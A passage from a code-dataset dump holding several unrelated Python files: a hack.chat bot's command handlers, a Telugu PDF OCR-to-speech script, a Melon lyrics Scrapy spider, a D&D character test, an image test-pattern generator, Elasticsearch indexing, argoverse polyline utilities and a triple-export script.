data[1].upper()\n toCode = data[2].upper()\n if fromCode and toCode:\n data = currency.convert(self._exchangeRateApiKey, fromCode,\n toCode)\n if data[\"type\"] == \"success\":\n converted = True\n self._hackChat.send(\n \"@{} 1 {} = \".format(self._info[\"nick\"], fromCode)\n + \"{} {}\".format(data[\"response\"], toCode))\n if not converted:\n self._hackChat.send(\n \"@{} Sorry, I couldn't convert \".format(self._info[\"nick\"])\n + \"that. 
(e.g., {}rate:usd:inr \".format(self._trigger)\n + \"gives 1 USD = 64 INR)\")\n\n def _define(self):\n \"\"\"Handles definitions.\"\"\"\n if self._msg:\n data = self._oxford.define(self._msg)\n if data[\"type\"] == \"success\":\n self._hackChat.send(\n \"@{} {}: \".format(self._info[\"nick\"], self._msg)\n + data[\"response\"])\n else:\n self._hackChat.send(\n \"@{} Sorry, I couldn't find \".format(self._info[\"nick\"])\n + \"any definitions for that.\")\n else:\n self._hackChat.send(\n \"@{} e.g., {}\".format(self._info[\"nick\"], self._trigger)\n + \"define hello\")\n\n def _generate_katex(self):\n \"\"\"Handles KaTeX.\"\"\"\n colors = [\"red\", \"orange\", \"green\", \"blue\", \"pink\", \"purple\", \"gray\",\n \"rainbow\"]\n sizes = [\"tiny\", \"scriptsize\", \"footnotesize\", \"small\", \"normalsize\",\n \"large\", \"Large\", \"LARGE\", \"huge\", \"Huge\"]\n fonts = [\"mathrm\", \"mathit\", \"mathbf\", \"mathsf\", \"mathtt\", \"mathbb\",\n \"mathcal\", \"mathfrak\", \"mathscr\"]\n if self._msg:\n disallowed = (\"#\", \"$\", \"%\", \"&\", \"_\", \"{\", \"}\", \"\\\\\", \"?\")\n if set(self._msg).isdisjoint(disallowed):\n data = self._cmd.split(\".\")\n stringify = lambda value: value if value else \"\"\n size = stringify(utility.identical_item(data, sizes))\n color = stringify(utility.identical_item(data, colors))\n font = stringify(utility.identical_item(data, fonts))\n txt = utility.remove_emoji(self._msg)\n txt = katex.generator(txt, size, color, font)\n self._hackChat.send(\n \"@{} says {}\".format(self._info[\"nick\"], txt))\n else:\n invalid = \"\\\"{}\\\"\".format(\"\\\", \\\"\".join(disallowed))\n self._hackChat.send(\n \"@{} KaTeX doesn't support \".format(self._info[\"nick\"])\n + invalid)\n else:\n reply = (\"@{} stylizes text (e.g., \".format(self._info[\"nick\"])\n + self._trigger\n + \"katex.rainbow.huge bye)\\n\")\n reply += \"OPTIONAL COLORS: {}\\n\".format(\", \".join(colors))\n reply += \"OPTIONAL SIZES: {}\\n\".format(\", \".join(sizes))\n reply += \"OPTIONAL FONTS: {}\\n\".format(\", \".join(fonts))\n self._hackChat.send(reply)\n\n def _give_poetry(self):\n \"\"\"Handles poetry.\"\"\"\n if self._msg:\n isPoet = True if self._cmd == \"poet\" else False\n data = poetry.poems(self._msg, isPoet)\n if data:\n rand = random.SystemRandom()\n data = data[rand.randrange(len(data))]\n header = \"{} by {}\".format(data[\"title\"], data[\"author\"])\n if len(header) > 100:\n header = \"{}...\".format(header[:97])\n pasted = paste.dpaste(data[\"poem\"], title=header)\n linked = \"Read the rest at {}\".format(pasted[\"data\"])\n reply = (\"@{} {}\\n\".format(self._info[\"nick\"], data[\"title\"])\n + \"By: {}\\n{}\".format(data[\"author\"], data[\"poem\"]))\n cut = utility.shorten_lines(reply, self._charsPerLine,\n self._maxLines - 1)\n self._hackChat.send(cut + linked)\n else:\n reply = \"@{} Sorry, I couldn't find any poems for that.\"\n self._hackChat.send(reply.format(self._info[\"nick\"]))\n else:\n if self._cmd == \"poem\":\n self._hackChat.send(\n \"@{} finds a poem by its name \".format(self._info[\"nick\"])\n + \"(e.g., {}poem sonnet)\".format(self._trigger))\n else:\n self._hackChat.send(\n \"@{} finds a poem from a poet \".format(self._info[\"nick\"])\n + \"(e.g., {}poet shakespeare)\".format(self._trigger))\n\n def _help(self):\n \"\"\"Sends a message on how to use the bot.\"\"\"\n joinWith = \" {}\".format(self._trigger)\n reply = joinWith.join(sorted(self._commands))\n reply = self._trigger + reply\n if self._codeUrl:\n reply += \"\\nsource code: 
{}\".format(self._codeUrl)\n self._hackChat.send(\"@{} {}\".format(self._info[\"nick\"], reply))\n\n def _join(self):\n \"\"\"Joins a channel.\"\"\"\n if self._msg:\n self._joinChannel(self._msg)\n else:\n self._hackChat.send(\n \"@{} joins a hack.chat channel \".format(self._info[\"nick\"])\n + \"(e.g., {}join ben)\\nYou can also \".format(self._trigger)\n + \"invite the bot via the sidebar.\")\n\n def _joke(self):\n \"\"\"Sends jokes.\"\"\"\n joke = jokes.yo_momma()\n self._hackChat.send(\"@{} {}\".format(self._info[\"nick\"], joke))\n\n def _leave(self):\n \"\"\"Leaves the channel currently connected to if allowed.\"\"\"\n if self._hackChat.channel in self._channels:\n self._hackChat.send(\"I cannot leave this channel.\")\n else:\n self._hackChat.leave()\n\n def _message(self):\n \"\"\"Saves messages to send to users when they're next active.\"\"\"\n info = self._cmd.split(\":\")\n if len(info) == 2 and info[1] and self._msg:\n self._db[\"messages\"].update_one(\n {\n self._hackChat.channel: {\n \"$exists\": True\n }\n },\n {\n \"$addToSet\": {\n \"{}.{}\".format(self._hackChat.channel, info[1]): {\n \"sender\": self._info[\"nick\"],\n \"message\": self._msg\n }\n }\n },\n True\n )\n self._hackChat.send(\n \"@{}, @{} will get your \".format(self._info[\"nick\"], info[1])\n + \"message the next time they message or join a channel.\")\n else:\n self._hackChat.send(\n \"@{} sends a message to a user the \".format(self._info[\"nick\"])\n + \"next time they send a message or join a channel (e.g., \"\n + \"{}msg:ben how are you?)\".format(self._trigger))\n\n def _request_statistics(self):\n \"\"\"Requests statistics.\"\"\"\n self._hackChat.stats()\n\n def _search(self):\n \"\"\"Handles searches.\"\"\"\n if self._msg:\n results = search.duckduckgo(self._msg, \"hack.chat bot\")\n reply = \"\"\n if results[\"URL\"]:\n reply += \"{} \".format(results[\"URL\"])\n if results[\"Heading\"]:\n reply += \"{}: \".format(results[\"Heading\"])\n if results[\"Answer\"]:\n reply += results[\"Answer\"]\n elif results[\"AbstractText\"]:\n reply += results[\"AbstractText\"]\n else:\n reply = \"\"\n tell = \"@{} \".format(self._info[\"nick\"])\n reply = utility.shorten(reply, self._maxChars - len(tell), \".\")\n if not reply:\n reply = \"Sorry, I couldn't find anything.\"\n self._hackChat.send(tell + reply)\n else:\n self._hackChat.send(\n \"@{} instant answers (e.g., \".format(self._info[\"nick\"])\n + \"{}search pokemon ruby)\".format(self._trigger))\n\n def _strengthen(self):\n \"\"\"Handles passwords.\"\"\"\n if self._msg:\n pwd = password.strengthen(self._msg)\n self._hackChat.send(\"@{} {}\".format(self._info[\"nick\"], pwd))\n else:\n self._hackChat.send(\n \"@{} strengthens a password (e.g., \".format(self._info[\"nick\"])\n + \"{}password gum)\".format(self._trigger))\n\n def _toss(self):\n \"\"\"Handles coin tosses.\"\"\"\n rand = random.SystemRandom()\n result = \"heads\" if rand.randrange(2) else \"tails\"\n self._hackChat.send(\"@{} {}\".format(self._info[\"nick\"], result))\n\n def _translate(self):\n \"\"\"Handles translations.\"\"\"\n languages = {\"english\": \"en\",\n \"spanish\": \"es\",\n \"pedi\": \"nso\",\n \"romanian\": \"ro\",\n \"malay\": \"ms\",\n \"zulu\": \"zu\",\n \"indonesian\": \"id\",\n \"tswana\": \"tn\"}\n explain = True\n if self._msg and len(re.findall(\":\", self._cmd)) == 2:\n data = self._cmd.lower().split(\":\")\n if data[1] in languages and data[2] in languages:\n explain = False\n srcLang = languages[data[1]]\n targetLang = languages[data[2]]\n words = 
self._msg.split()\n translations = []\n for word in words:\n word = re.sub(r\"[^a-zA-Z]\", \"\", word)\n word = self._oxford.translate(word, targetLang, srcLang)\n if word[\"type\"] == \"failure\":\n translations = []\n break\n translations.append(word[\"response\"])\n if translations:\n translated = \" \".join(translations)\n self._hackChat.send(\n \"@{} {}\".format(self._info[\"nick\"], translated))\n else:\n self._hackChat.send(\n \"@{} Sorry, I couldn't \".format(self._info[\"nick\"])\n + \"translate it all.\")\n if explain:\n self._hackChat.send(\n \"@{} supported languages: \".format(self._info[\"nick\"])\n + \"{}\\ne.g., \".format(\", \".join(languages.keys()))\n + \"{}\".format(self._trigger)\n + \"translate:english:spanish I have a holiday!\\n\")\n\n def _urban_define(self):\n \"\"\"Handles urban definitions.\"\"\"\n if self._msg:\n data = dictionary.urban(self._msg)\n if data:\n reply = \"@{} {}: {} \".format(self._info[\"nick\"], data[\"word\"],\n data[\"definition\"])\n reply = utility.shorten_lines(reply, self._charsPerLine,\n self._maxLines - 1)\n self._hackChat.send(reply + data[\"permalink\"])\n else:\n self._hackChat.send(\n \"@{} Sorry, I couldn't find \".format(self._info[\"nick\"])\n + \"any definitions for that.\")\n else:\n self._hackChat.send(\n \"@{} searches Urban Dictionary \".format(self._info[\"nick\"])\n + \"(e.g., {}urban covfefe)\".format(self._trigger))\n\n\nif __name__ == \"__main__\":\n HackChatBot()\n","repo_name":"neelkamath/hack.chat-bot","sub_path":"src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":23406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31877720562","text":"from utils import get_lib_dir, delimited_string, find_or_create\nfrom dotenv import load_dotenv, dotenv_values\nfrom tesseract_comp import extract_info\nfrom pdf2imageconverter import convert_pdf_to_image\nimport pytesseract\nfrom gtts import gTTS\nimport os\nfrom PIL import Image\n\n\n\nload_dotenv()\n\npdf_path = f'{os.getcwd()}{dotenv_values()[\"PDF_PATH\"]}'\n\ntesser_data = os.getcwd()+dotenv_values()['TESSER_TES_DATS']\n\nos.environ['TESSDATA_PREFIX'] = tesser_data\n\ntesser_path = dotenv_values()['TESSER_PATH_']+f\"{delimited_string}tesseract.exe\"\n\npytesseract.pytesseract.tesseract_cmd = f'''{os.getcwd()}{tesser_path}'''\n\naudio_dir = \"audios\" + delimited_string\nimage_dir = \"images\"+ delimited_string\nextracted_text = \"text\"+ delimited_string\n\nfor file in os.listdir(pdf_path):\n\n if file.split('.')[-1] == 'pdf':\n f_dir = f'{file.split(\".\")[0]}{delimited_string}'\n find_or_create([audio_dir+f_dir, image_dir+f_dir, extracted_text+f_dir])\n images = convert_pdf_to_image(pdf_path+f'{delimited_string}{file}', get_lib_dir(os.getcwd(),\n delimited_string, dotenv_values()['POPPLER_BIN'], 0))\n\n cnt = 0\n for image in images:\n cnt += 1\n image.save(image_dir+f_dir+f'{cnt}.jpg', \"JPEG\")\n print(\"extracting page: \", image)\n with open(extracted_text+f_dir+f'{cnt}.txt', 'w', encoding=\"utf-8\") as txt_file:\n txt_file.write(extract_info(image))\n myobj = gTTS(text=extract_info(image), lang=\"te\", slow=False)\n myobj.save(audio_dir+f_dir+f'{cnt}.mp3')\n\n","repo_name":"shankar369/Telugu-PDF-Reader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"72332520869","text":"# This package will contain the spiders of your Scrapy project\n#\n# Please refer to the documentation for information on how to create and manage\n# your spiders.\n# This package will contain the spiders of your Scrapy project\n#\n# Please refer to the documentation for information on how to create and manage\n# your spiders.\n#https://www.youtube.com/results?search_query=%EC%9A%B4%EB%AA%85%EC%9D%B4+%EB%82%B4%EA%B2%8C+%EB%A7%90%ED%95%B4%EC%9A%94+%ED%97%A4%EC%9D%B4%EC%A6%88+%28Heize%29+%EA%B0%80\nimport scrapy\nimport pandas as pd\nimport json\nimport re\nfrom pytube import YouTube\nimport os\nimport pandas as pd\nclass QuotesSpider(scrapy.Spider):\n def __init__(self, name=None, **kwargs):\n super().__init__(name=name, **kwargs)\n custom_settings = {\n 'DOWNLOADER_MIDDLEWARES' : {\n 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,\n 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None,\n 'scrapy_fake_useragent.middleware.RandomUserAgentMiddleware': 400,\n 'scrapy_fake_useragent.middleware.RetryUserAgentMiddleware': 401,\n }\n }\n\n self.save_result_path = '/content/drive/MyDrive/data/svs/melone_result_re.tsv'\n self.input_list = '../data.tsv'\n\n if os.path.isfile(self.save_result_path):\n self.song_db = pd.read_csv(self.save_result_path,sep='\\t')\n else: \n self.song_db = pd.DataFrame(columns = ['titles' , 'artist', 'lyrics'])\n \n self.lyrics_series = list(self.song_db['lyrics'])\n self.title_series = list(self.song_db['titles'])\n self.artist_series = list(self.song_db['artist'])\n name = \"quotes\"\n\n def make_url(self):\n data = pd.read_csv(self.input_list,sep='\\t')\n data = data[['titles','artist']]\n if len(self.song_db) != 0:\n data = pd.concat([data,self.song_db[['titles','artist']]]).drop_duplicates(keep=False)\n print(data.head())\n print('????????????????')\n if len(data) == 0:\n print('finished')\n data['adding'] = data['titles'] + ' ' + data['artist']\n \n urls = []\n info = []\n for i,j,k in zip(data['adding'],data['titles'],data['artist']):\n urls.append('https://www.melon.com/search/total/index.htm?q='+i)\n #urls.append('https://www.melon.com')\n info.append([['title',j],['artist',k]])\n return urls,info\n\n def start_requests(self):\n urls, info = self.make_url()\n for url,meta in zip(urls,info):\n yield scrapy.Request(url=url, callback=self.parse,meta=meta)\n\n def parse(self, response):\n song_id = None\n\n titles = response.xpath('//*[@id=\"conts\"]/div[*]/div[1]/ul/li[*]/dl/dt/a[2]/text()').getall()\n for i,title in enumerate(titles):\n if title.replace(' ','') == response.meta['title'].replace(' ',''):\n song_id = response.xpath('//*[@id=\"conts\"]/div[*]/div/ul/li['+str(i+1)+']/dl/dt/a[1]/@data-song-no').get()\n break\n\n if song_id == None:\n song_list = response.xpath('//*[@id=\"frm_songList\"]/div/table/tbody/tr[*]/td[3]/div/div/a[2]/@title').getall()\n list_id = ['frm_songList'] * len(song_list)\n temp = response.xpath('//*[@id=\"frm_searchSong\"]/div/table/tbody/tr[*]/td[3]/div/div/a[2]/@title').getall()\n list_id = list_id + ['frm_searchSong'] * len(temp)\n song_list = song_list + temp\n\n for i,title in enumerate(song_list):\n if title.replace(' ','') == response.meta['title'].replace(' ',''):\n song_id = response.xpath('//*[@id=\"'+list_id[i]+'\"]/div/table/tbody/tr/td['+str(i+1)+']/div/input/@value').get()\n if song_id == None:\n song_id = response.xpath('//*[@id=\"'+list_id[i]+'\"]/div/table/tbody/tr['+str(i+1)+']/td[1]/div/input/@value').get()\n break\n else:\n break\n \n if song_id == None:\n 
for i,title in enumerate(song_list):\n if response.meta['title'].replace(' ','') in title.replace(' ',''):\n song_id = response.xpath('//*[@id=\"'+list_id[i]+'\"]/div/table/tbody/tr/td['+str(i+1)+']/div/input/@value').get() \n if song_id == None: \n song_id = response.xpath('//*[@id=\"'+list_id[i]+'\"]/div/table/tbody/tr['+str(i+1)+']/td[1]/div/input/@value').get()\n break\n else:\n break\n \n if song_id == None:\n print('failed:',response.meta)\n\n #print('song_id: '+str(song_id.get()))\n url = 'https://www.melon.com/song/detail.htm?songId='+str(song_id)\n yield scrapy.Request(url=url, callback=self.parse_lyrics,meta=response.meta)\n\n def parse_lyrics(self,response):\n data = response.xpath('//*[@id=\"d_video_summary\"]/text()').getall()\n if len(data) == 1:\n data = response.xpath('//*[@id=\"d_video_summary\"]/*/text()').getall()\n lyrics = re.sub('[(\\\\r\\\\n(\\\\t){1,})(\\\\r{1,})]','', '%'.join(data))\n lyrics = re.sub('%{1,}','%',lyrics)\n if len(data) == 1:\n lyrics = re.sub('(\\\\r\\\\n){1,}','%',lyrics) \n \n #raw_data = {'titles':response.meta['title'],'artist':response.meta['artist'],'lyrics':lyrics.replace(\"\\n\",\"\")}\n self.title_series.append(response.meta['title'])\n self.artist_series.append(response.meta['artist'])\n self.lyrics_series.append(lyrics)\n self.song_db = pd.DataFrame()\n self.song_db['titles'] = pd.Series(self.title_series)\n self.song_db['artist'] = pd.Series(self.artist_series)\n self.song_db['lyrics'] = pd.Series(self.lyrics_series)\n self.song_db.to_csv(self.save_result_path,sep='\\t',index=False)","repo_name":"Ldoun/DeepSinger","sub_path":"data_crawling/lyrics_down/lyrics_down/spiders/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"71"}
+{"seq_id":"69946269350","text":"from unittest import TestCase\nfrom battle.ki import KiCharacter\nfrom character import *\nfrom dice import d6\nimport dnd\nimport random\nimport math\n\ncore.unit_length = core.UNIT_LENGTH_METER\ncore.unit_weight = core.UNIT_WEIGHT_KILOGRAM\n\n\nclass CharacterTest(TestCase):\n\n def __roll_ability_score(self):\n results = list()\n for i in range(0, 3):\n results.append(d6.roll())\n results.sort(reverse=True)\n return sum(results[:3])\n\n def __random_race(self):\n races = [dnd.human, dnd.elf, dnd.gnome, dnd.half_elf, dnd.half_orc, dnd.halfling]\n return races[math.floor(random.random() * len(races))]\n\n def __random_class(self):\n classes = [\n dnd.barbarian, dnd.bard, dnd.druid, dnd.cleric, dnd.sorcerer,\n dnd.wizard, dnd.rogue, dnd.monk, dnd.paladin, dnd.fighter\n ]\n return classes[math.floor(random.random() * len(classes))]\n\n def __random_gender(self):\n genders = [GENDER_FEMALE, GENDER_MALE]\n return genders[math.floor(random.random() * len(genders))]\n\n def __random_skill(self):\n skills = Skill.available_skills()\n return skills[math.floor(random.random() * len(skills))]\n\n def __random_feat(self):\n feats = Feat.available_feats()\n return feats[math.floor(random.random() * len(feats))]\n\n def random_character(self):\n random_character = KiCharacter(\"Random Character\")\n random_character.set_race(self.__random_race())\n\n # apply base stats\n random_character._strength = self.__roll_ability_score()\n random_character._wisdom = self.__roll_ability_score()\n random_character._charisma = self.__roll_ability_score()\n random_character._intellect = self.__roll_ability_score()\n random_character._dexterity = self.__roll_ability_score()\n random_character._constitution = self.__roll_ability_score()\n\n # add xp to be able to add class levels\n random_character.add_experience(5000)\n\n # assign class levels\n random_class = self.__random_class()\n for i in range(0, 10):\n random_character.add_class_level(random_class)\n\n random_character._gender = self.__random_gender()\n random_character._age = random_character.starting_age(random_character._classes[0]._starting_age_type)\n random_character._height = random_character.roll_height()\n random_character._weight = random_character.roll_weight()\n\n for i in range(0, 1 + math.floor(random.random() * 2)):\n random_character.learn_skill(self.__random_skill())\n\n random_character.learn_feat(self.__random_feat())\n return random_character\n\n def test_character(self):\n for i in range(0, 10):\n char = self.random_character()\n print(char)\n\n \"\"\"\n print(\"str\\t\\t\", tenlon.strength())\n print(\"wis\\t\\t\", tenlon.wisdom())\n print(\"cha\\t\\t\", tenlon.charisma())\n print(\"int\\t\\t\", tenlon.intellect())\n print(\"dex\\t\\t\", tenlon.dexterity())\n print(\"con\\t\\t\", tenlon.constitution())\n print(\"age\\t\\t\", tenlon._age)\n print(\"hp\\t\\t\", tenlon.hit_points())\n print(\"age-type\", tenlon.relative_age())\n print(\"height\\t\", tenlon.height(), \"m\")\n print(\"weight\\t\", tenlon.weight(), \"kg\")\n print(\"skills\\t\", tenlon._skills)\n print(\"feats\\t\", tenlon.feats())\n print(tenlon._skills[0].name + \"\\t\", tenlon.use_skill(tenlon._skills[0].name))\n \"\"\"\n\n","repo_name":"Kilghaz/pyd20","sub_path":"test/test_character.py","file_name":"test_character.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"15169724166","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\nimport argparse\nimport Image\nimport ImageDraw\n# Definition\nCANVAS_X = (2880)\nCANVAS_Y = (1440)\nSTART_X1 = (760)\nSTART_Y1 = (720)\nSTART_X2 = (2160)\nSTART_Y2 = (720)\nBOX_WIDTH = (50)\nBOX_SPACING = (10)\nINDEX_START = (1.0)\nNUM_BOXS = (4)\nOUTLINE_OFFSET = (10)\nLINE_WIDTH = (3)\nLINE_COLOR = \"white\"\nTEMPFILE = \"pattern.png\"\nOUTFILE = \"test_pattern.png\"\nPATTERN_NUM = (2)\n# args parser\n# ---------------------------------------------------------------------------\nparser = argparse.ArgumentParser()\nparser.add_argument('--verbose', '-v',\n default=0,\n action='store_true',\n help='verbose flag')\nparser.add_argument('--outfile', '-o',\n default=OUTFILE,\n help='Filename to process')\nparser.add_argument('--x1',\n default=START_X1,\n type=int,\n help=\"The X1 coordinate of start\")\nparser.add_argument('--y1',\n default=START_Y1,\n type=int,\n help=\"The Y1 coordinate of start\")\nparser.add_argument('--x2',\n default=START_X2,\n type=int,\n help=\"The X2 coordinate of start\")\nparser.add_argument('--y2',\n default=START_Y2,\n type=int,\n help=\"The Y2 coordinate of start\")\nparser.add_argument('--box_width', '-w',\n default=BOX_WIDTH,\n type=int,\n help=\"The width of Box\")\nparser.add_argument('--box_spacing', '-s',\n default=BOX_SPACING,\n type=int,\n help=\"The width between Boxs\")\nparser.add_argument('--canvas_x', '-c',\n default=CANVAS_X,\n type=int,\n help=\"The width of Canvas\")\nparser.add_argument('--canvas_y', '-d',\n default=CANVAS_Y,\n type=int,\n help=\"The hight of Canvas\")\nparser.add_argument('--num_boxs', '-n',\n default=NUM_BOXS,\n type=int,\n help=\"Number of Boxs of each row\")\nparser.add_argument('--pattern_rgb', '-p',\n default='w',\n choices=['r', 'g', 'b', 'w', 'R', 'G', 'B', 'W'],\n help=\"Number of Boxs of each row\")\nparser.add_argument('--outline_width', '-b',\n default=OUTLINE_OFFSET,\n type=int,\n help=\"The offset of outline\")\nparser.add_argument('--line_width', '-l',\n default=LINE_WIDTH,\n type=int,\n help=\"The offset of outline\")\nargs = parser.parse_args()\n# ---------------------------------------------------------------------------\n\n\ndef create_canvas(canvas_x, canvas_y):\n im = Image.new(\"RGB\", (canvas_x, canvas_y))\n return im\n\n\ndef draw_color_box(draw, num_boxs, box_width, box_spacing,\n pattern_rgb, line_width):\n start_x = box_spacing + line_width\n start_y = box_spacing + line_width\n index = INDEX_START\n unit_div = (255.0)/((num_boxs**2)-1)\n for y in range(start_y, start_y+(box_width+box_spacing)*num_boxs,\n (box_width+box_spacing)):\n for x in range(start_x, start_x+(box_width+box_spacing)*num_boxs,\n (box_width+box_spacing)):\n cor = (x, y, x+box_width, y+box_width)\n if args.verbose:\n print(\"(x,y,x2,y2)={}\".format(cor))\n if index == INDEX_START:\n color_fill = 0\n elif index == (num_boxs**2):\n color_fill = 255\n else:\n color_fill = int((index-1) * unit_div)\n if pattern_rgb == 'w' or pattern_rgb == 'W':\n final_color = (color_fill, color_fill, color_fill, 255)\n if pattern_rgb == 'r' or pattern_rgb == 'R':\n final_color = (color_fill, 0, 0, 255)\n if pattern_rgb == 'g' or pattern_rgb == 'G':\n final_color = (0, color_fill, 0, 255)\n if pattern_rgb == 'b' or pattern_rgb == 'B':\n final_color = (0, 0, color_fill, 255)\n draw.rectangle(cor, fill=final_color)\n if args.verbose:\n print(\"final_color={}\".format(final_color))\n index = index + 1\n\n\ndef draw_box_outline(im, color, line_width):\n width, height = im.size\n 
draw = ImageDraw.Draw(im)\n cor = (line_width, line_width, width-1-line_width,\n height-1-line_width) # (x1,y1, x2,y2)\n line = (cor[0], cor[1], cor[0], cor[3])\n draw.line(line, fill=color, width=line_width)\n line = (cor[0], cor[1], cor[2], cor[1])\n draw.line(line, fill=color, width=line_width)\n line = (cor[0], cor[3], cor[2], cor[3])\n draw.line(line, fill=color, width=line_width)\n line = (cor[2], cor[1], cor[2], cor[3])\n draw.line(line, fill=color, width=line_width)\n\n\ndef merge(a, b):\n # Materialise the images in a list; the original map() iterator was\n # exhausted by the zip() below, so the paste loop saw nothing on Python 3.\n images = [Image.open(p) for p in (a, b)]\n widths, heights = zip(*(i.size for i in images))\n\n total_width = sum(widths)\n max_height = max(heights)\n\n new_im = Image.new('RGB', (total_width, max_height))\n\n x_offset = 0\n for im in images:\n new_im.paste(im, (x_offset, 0))\n x_offset += im.size[0]\n\n new_im.save('test.png')\n\n\ndef picture_canvas_prepare(nb, bw, sw, of, lw):\n y_w = x_w = nb * bw + (nb - 1) * sw + lw * 2 + 2 * of\n im = create_canvas(x_w, y_w)\n draw = ImageDraw.Draw(im)\n return im, draw\n\n\ndef pattern_paste(pattern_file, canvas, target, outputfile, num):\n img = Image.open(pattern_file, 'r')\n img_w, img_h = img.size\n background = Image.new('RGB', canvas)\n bg_w, bg_h = background.size\n # Use floor division: paste offsets must be integers on Python 3.\n if num == 1:\n target_x1, target_y1 = target\n background.paste(img, (target_x1-img_w//2, target_y1-img_h//2))\n elif num == 2:\n target_x1, target_y1, target_x2, target_y2 = target\n background.paste(img, (target_x1-img_w//2, target_y1-img_h//2))\n background.paste(img, (target_x2-img_w//2, target_y2-img_h//2))\n\n background.save(outputfile)\n\n\ndef main():\n num_boxs = args.num_boxs\n box_width = args.box_width\n box_spacing = args.box_spacing\n pattern_rgb = args.pattern_rgb\n outline_width = args.outline_width\n line_width = args.line_width\n im, draw = picture_canvas_prepare(num_boxs, box_width,\n box_spacing, outline_width, line_width)\n draw_color_box(draw, num_boxs, box_width, box_spacing, pattern_rgb,\n line_width)\n draw_box_outline(im, LINE_COLOR, line_width)\n im.save(TEMPFILE)\n pattern_paste(TEMPFILE, (args.canvas_x, args.canvas_y),\n (args.x1, args.y1, args.x2, args.y2),\n args.outfile, PATTERN_NUM)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jimlin95/test_pattern","sub_path":"gen_test_pattern_v2.py","file_name":"gen_test_pattern_v2.py","file_ext":"py","file_size_in_byte":6881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72601860699","text":"import pandas as pd\nfrom elasticsearch import Elasticsearch\n\n\nes = Elasticsearch('localhost:9200')\n\n\ndef create_index(mapping: dict, index_name: str) -> None:\n es.indices.create(index=index_name)\n es.indices.put_mapping(index=index_name, body=mapping)\n\n\ndef insert_data(file_path: str, index_name: str) -> None:\n df = pd.read_json(file_path).fillna(\"\")\n for _, row in df.iterrows():\n doc = row.to_dict()\n es.index(index=index_name, body=doc) \n\n\nif __name__ == \"__main__\":\n\n index_name = \"song_txt_corpus\"\n file_path = \"../data/corpus.json\"\n\n mapping = {\n \"properties\": {\n \"artist\": {\"type\": \"text\"},\n \"song_name\": {\"type\": \"text\"},\n \"song_txt\": {\"type\": \"text\"},\n \"song_href\": {\"type\": \"text\"},\n \"song_id\": {\"type\": \"integer\"},\n \"top_similar\": {\"type\": \"integer\"},\n }\n }\n\n create_index(mapping=mapping, index_name=index_name)\n insert_data(file_path=file_path, index_name=index_name)","repo_name":"BlackRaveOn/russian_songs_corpus","sub_path":"es_utils/create_corpus.py","file_name":"create_corpus.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"75022905178","text":"from typing import Tuple\n\nimport numpy as np\n\nfrom argoverse.utils.interpolate import interp_arc\n\nNUM_PTS_PER_TRAJ = 50\n\n\ndef get_polyline_length(polyline: np.ndarray) -> float:\n \"\"\"Calculate the length of a polyline.\n\n Args:\n polyline: Numpy array of shape (N,2)\n\n Returns:\n The length of the polyline as a scalar\n \"\"\"\n assert polyline.shape[1] == 2\n return float(np.linalg.norm(np.diff(polyline, axis=0), axis=1).sum())\n\n\ndef interpolate_polyline_to_ref_density(polyline_to_interp: np.ndarray, ref_polyline: np.ndarray) -> np.ndarray:\n \"\"\"\n Interpolate a polyline so that its density matches the density of a reference polyline.\n\n ::\n\n ref_l2 query_l2\n ---------------- = --------------\n NUM_PTS_PER_TRAJ num_interp_pts\n\n Args:\n polyline_to_interp: Polyline to interpolate -- numpy array of shape (M,2)\n ref_polyline: Reference polyline -- numpy array of shape (N,2)\n\n Returns:\n Interpolated polyline -- numpy array of shape (K,2)\n \"\"\"\n ref_l2 = get_polyline_length(ref_polyline)\n query_l2 = get_polyline_length(polyline_to_interp)\n num_interp_pts = int(query_l2 * NUM_PTS_PER_TRAJ / ref_l2)\n dense_interp_polyline = interp_arc(num_interp_pts, polyline_to_interp[:, 0], polyline_to_interp[:, 1])\n return dense_interp_polyline\n\n\ndef traverse_polyline_by_specific_dist(polyline_to_walk: np.ndarray, l2_dist_to_walk: float) -> Tuple[np.ndarray, bool]:\n \"\"\"\n Walk a distance along a polyline, and return the points along which you walked.\n\n Assumption: polyline is much longer than the distance to walk.\n\n Args:\n polyline_to_walk: Numpy array of shape (N,2)\n l2_dist_to_walk: Distance to traverse\n\n Returns:\n Tuple of (polyline, success flag)\n \"\"\"\n MAX_NUM_PTS_TO_WALK = 100\n dense_polyline_to_walk = interp_arc(MAX_NUM_PTS_TO_WALK, polyline_to_walk[:, 0], polyline_to_walk[:, 1])\n\n for i in range(MAX_NUM_PTS_TO_WALK):\n l2 = get_polyline_length(dense_polyline_to_walk[:i])\n if l2 > l2_dist_to_walk:\n # break from for-loop execution and return\n return dense_polyline_to_walk[:i], True\n\n return dense_polyline_to_walk, False\n","repo_name":"argoverse/argoverse-api","sub_path":"argoverse/utils/polyline_density.py","file_name":"polyline_density.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":760,"dataset":"github-code","pt":"69"}
+{"seq_id":"23454595920","text":"import argparse\nfrom embedding_triples import RDFTriples\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--kbs', type=str, nargs='+', default=['carcinogenesis'], help='Knowledge base name')\n\nfor kb in parser.parse_args().kbs:\n triples = RDFTriples(source_kb_path=f'../datasets/{kb}/{kb}.owl')\n triples.export_triples()","repo_name":"dice-group/NCES2","sub_path":"generators/kb_to_kg.py","file_name":"kb_to_kg.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
